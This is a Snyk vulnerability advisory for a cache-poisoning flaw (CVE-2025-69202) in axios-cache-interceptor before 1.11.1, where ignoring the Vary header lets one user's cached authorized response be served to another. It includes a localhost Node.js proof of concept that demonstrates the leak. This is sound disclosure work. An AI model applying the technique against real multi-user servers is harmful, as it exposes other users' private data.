Cache Poisoning Affecting axios-cache-interceptor package, versions <1.11.1
Threat Intelligence
Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
The probability is the direct output of the EPSS model, and conveys an overall sense of the threat of exploitation in the wild. The percentile measures the EPSS probability relative to all known EPSS scores. Note: This data is updated daily, relying on the latest available EPSS model version. Check out the EPSS documentation for more details.
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk IDSNYK-JS-AXIOSCACHEINTERCEPTOR-14724265
- published30 Dec 2025
- disclosed29 Dec 2025
- creditkishore03109
Introduced: 29 Dec 2025
NewCVE-2025-69202 (opens in a new tab)How to fix?
Upgrade axios-cache-interceptor to version 1.11.1 or higher.
Overview
axios-cache-interceptor is a Cache interceptor for axios
Affected versions of this package are vulnerable to Cache Poisoning by ignoring the Vary HTTP header. An attacker can access unauthorized cached responses to obtain sensitive user data by sending requests with multiple different authorization tokens, as the cache does not differentiate based on the Authorization header when an upstream service uses the Vary: Authorization response header.
Note:
This is only exploitable if the application is server-side, handles requests from multiple users with different authorization tokens, and the upstream service relies on the Vary header to differentiate cache entries.
PoC
const http = require('node:http');
const axios = require('axios');
const { setupCache } = require('axios-cache-interceptor');
// Server that returns different responses based on Authorization
const server = http.createServer((req, res) => {
const auth = req.headers.authorization;
res.setHeader('Vary', 'Authorization');
if (auth === 'Bearer 123') {
res.write('Hello, user 123!');
} else if (auth === 'Bearer 456') {
res.write('Hello, user 456!');
} else {
res.write('Unknown');
}
res.end();
});
server.listen(5000);
// Client making requests with different tokens
const cachedAxios = setupCache(axios.create());
const server2 = http.createServer(async (_req, res) => {
const authHeader =
Math.random() < 0.5 ? 'Bearer 123' : 'Bearer 456';
const response = await cachedAxios.get('http://localhost:5000', {
headers: { Authorization: authHeader }
});
console.log({
response: response.data,
cached: response.cached,
auth: authHeader
});
res.write(response.data);
res.end();
});
server2.listen(5001);
// Trigger 10 requests
Promise.all(
Array.from({ length: 10 }, () =>
axios.get('http://localhost:5001').catch(console.error)
)
).finally(() => {
server.close();
server2.close();
});